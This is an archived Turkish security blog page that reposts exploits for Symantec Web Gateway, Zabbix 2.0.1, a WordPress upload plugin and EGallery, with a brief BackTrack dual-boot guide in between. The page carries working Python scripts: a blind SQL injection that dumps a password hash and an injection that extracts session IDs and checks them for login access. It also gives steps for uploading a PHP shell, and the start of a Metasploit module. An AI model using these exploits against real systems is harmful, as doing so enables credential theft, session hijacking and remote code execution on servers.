Archive for 30 Temmuz 2012

Symantec Web Gateway 5.0.3.18 Blind SQLi

Symantec Web Gateway 5.0.3.18 (deptUploads_data.php groupid parameter) Blind SQLi açığı

spywall/includes/deptUploads_data.php? de bulunan Blind SQL injection açığı sayesinde aşağıdaki pythan script sayesinde verilere ulaşma imkanı sağlıyor.

__________________________________

#!/usr/bin/python

#

# Blind SQLi POC

# Dumps out the first available hash in the users table of spywall_db

import urllib

import time

from time import sleep

timing=’2.5′

checks = 0

 

def check_char(i, pos):

            global timimg

            global checks

            checks += 1

            url = ‘https://192.168.200.132/spywall/includes/deptUploads_data.php?groupid=1 union select 1,2, IF (%s=conv(mid((select password from users),%s,1),16,10),SLEEP(%s),null);–‘ % (i,pos,timing)

            start = time.time()

            urllib.urlopen(url)

            end = time.time()

            howlong = end-start

            return howlong

 

def check_pos(pos):

 

            for m in range(0,16):

                        output = check_char(m, pos)

                        print “[*] Character %s – Took %s seconds” % (hex(m)[2:],output)

                        if output > 2:

                                   return hex(m)[2:]

                                  

 

md5 = ”

start = time.time()

for y in range(1,33):

            print “Checking position %s” % (y)

            md5 += check_pos(y)

            print md5

            end = time.time()

            howlong = end-start

 

print “1st hash:%s” % (md5)

print “Found in %s queries” % (checks)

print “Found in %s” %(howlong)

__________________________________

Windows 7 ve BackTrack 5’i Aynı Bilgisayara Kurma

Merhaba arkadaşlar, bu makalemizde bilgisayarımızda kullandığımız Windows 7 işletim sistemini değiştirmeden BackTrack 5 işletim sistemini bilgisayarımıza kuracağız. Böylece istediğimiz zaman bilgisayarımıza Windows 7 ile başlatabilir, istediğimiz zaman da BackTrack işletim sisteminden bilgisayarımızı başlatabileceğiz. Wmware üzerine kurulan BackTrack işletim sistemlerinde çeşitli driver sorunları meydana gelmektedir. En iyi çözüm yolu Live CD kullanmak ya da işletim sistemini bilgisayara yüklemek olacaktır. Buradan yola çıkarak BackTrack 5 işletim sistemini, mevcut sistem yapımızı bozmadan bilgisayarımıza kuracağız.

 

(Makalenin devamı Windows 7 işletim sisteminizin bilgisayarınızda kurulu ve hâlihazırda çalışır vaziyette olduğu düşünülerek hazırlanmıştır.)

Windows 7 işletim sisteminize göre uygun BackTrack 5 – R1 sürümlerini bu adresten indirebilirsiniz. Eğer işletim sisteminiz Windows 7 32 Bit ise BackTrack 5’in 32 Bit sürümlerinden (Gnome,KDE) birini, Windows 7 64 Bit işletim sistemini kullanıyorsanız, BackTrack 5 64 Bit sürümlerinden (Gnome,KDE) birini .iso formatında indirip CD ye yazdırın. Ardından yazdığın CD’yi bilgisayarınıza yerleştirdikten sonra, bilgisayarınızı CD den başlayacak şekilde yeniden başlatın.

Resim-01 Read more

Zabbix 2.0.1 Session Extractor 0day

Zabbix 2.0.1 versiyonunda zabbix/popup_bitem.php, zabbix/scripts.php sql ye gönderilen mesajlarla Oturum yetkisi veriyor.

 

#!/usr/bin/python

 

import re

import sys,urllib2,urllib

 

print “\n[*] Zabbix 2.0.1 Session Extractor 0day”

print “[*] http://www.offensive-security.com”

print “##################################\n”

 

”’

 

The sessions found by this tool may allow you to access the scripts.php file.

Through this web interface, an administrator can define new malicious scripts.

These scripts can then be called from the maps area, and executed with “zabbix” permissions.

 

Timeline:

 

17 Jul 2012: Vulnerabilty reported

17 Jul 2012: Reply received

18 Jul 2012: Issue opened: https://support.zabbix.com/browse/ZBX-5348

19 Jul 2012: Fixed for inclusion in version 2.0.2

 

”’

 

ip=”172.16.164.150″

 

target = ‘http://%s/zabbix/popup_bitem.php’ % ip

url = ‘http://%s/zabbix/scripts.php’ % ip

 

def sendSql(num):

        global target

        payload=”1)) union select 1,group_concat(sessionid) from sessions where userid=’%s’#” % num

        payload=”1 union select 1,1,1,1,1,group_concat(sessionid),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from sessions where userid=’%s’#” % num

        values = {‘dstfrm’:’1′,’itemid’:payload }

        url = “%s?%s” % (target, urllib.urlencode(values)) 

        req = urllib2.Request(url)                         

        response = urllib2.urlopen(req)                

        data = response.read()                 

        return data

 

def normal(cookie):

            global url

        req = urllib2.Request(url)

        cook = “zbx_sessionid=%s” %cookie

        req.add_header(‘Cookie’, cook)

        response = urllib2.urlopen(req)                

        data = response.read()                 

        if re.search(‘ERROR: Session terminated, re-login, please’,data) or re.search(‘You are not logged in’,data) or re.search(‘ERROR: No Permissions’,data):

                return “FAIL”

        else:

                return “SUCCESS”

 

sessions=[]

 

for m in range(1,2):

            print “[*] Searching sessions belonging to id %s” % m

        hola=sendSql(m)

        for l in re.findall(r”([a-fA-F\d]{32})”, hola):

                        if l not in sessions:

                                   sessions.append(l)

                            print “[*] Found sessionid %s – %s” % (l,normal(l))

WordPress Front End Upload v0.5.4.4 Arbitrary PHP File Upload

WordPress Front End Upload v0.5.4.4 Arbitrary PHP File Upload

WordPress Front Ent Upload v0.5.4.4 sürümünde bulunan açık nedeniyle Php dosya uploadına izin veriyor. php.jpg uzantılı olarak php shell upload etmek mümkün. Açık kapanana kadar, wp-content upload klasörünü geçici olarak devre dışı bırakmanızı öneririm. Açığı fixlenmiş sürümünü yükledikten sonra yolunuza devam edebilirsiniz.

 

# Exploit Title: WordPress Front End Upload v0.5.4.4 Arbitrary PHP File Upload Vulnerability
# Date: 7/23/12
# Exploit Author: Chris Kellum
# Vendor Homepage: http://mondaybynoon.com/
# Software Link: http://downloads.wordpress.org/plugin/front-end-upload.0.5.4.4.zip
# Version: 0.5.4.4
=====================
Vulnerability Details
=====================
Plugin does not properly filter filetypes, which allows for the upload of filetypes in the following format:
filename.php.jpg
Vulnerable hosts will serve such files as a php file, allowing for malicious files to be uploaded and executed.
In creating the uploads folder for this plugin, the code utilizes uniqid to add a unique string to the upload folder name in order to better hide it from direct access.
Example:
/wp-content/uploads/feu_9fc12558ac71e6995808cfc590207e87/
However, many WordPress installations allow direct access to the /wp-content/uploads/ folder, so simply look for a folder name beginning with 'feu_' to locate your upload.
===================
Disclosure Timeline
===================
7/13/2012 - Vendor notified
7/23/2012 - Version 0.5.4.6 released
7/23/2012 - Public disclosure

EGallery PHP File Upload Vulnerability

EGallery 1.2 egallery/uploadify.php de bulunan php shell script zararlı dosya uploadına izin veren zayıflık.

Php script upload edilirse ne olur? bayağı tehlikeli olur. Servere full erişim sağlanabilir, zararlı amaçlar için kullanılabilir, dolayısıyle php uploada kapatılmalıdır. Eğer kapatamıyorsanız, açığı kapatılmış sürüm yüklenene kadar uploadify.php yi devre dışı bırakınız.

 

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require ‘msf/core’

class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, ‘Name’ => “EGallery PHP File Upload Vulnerability”,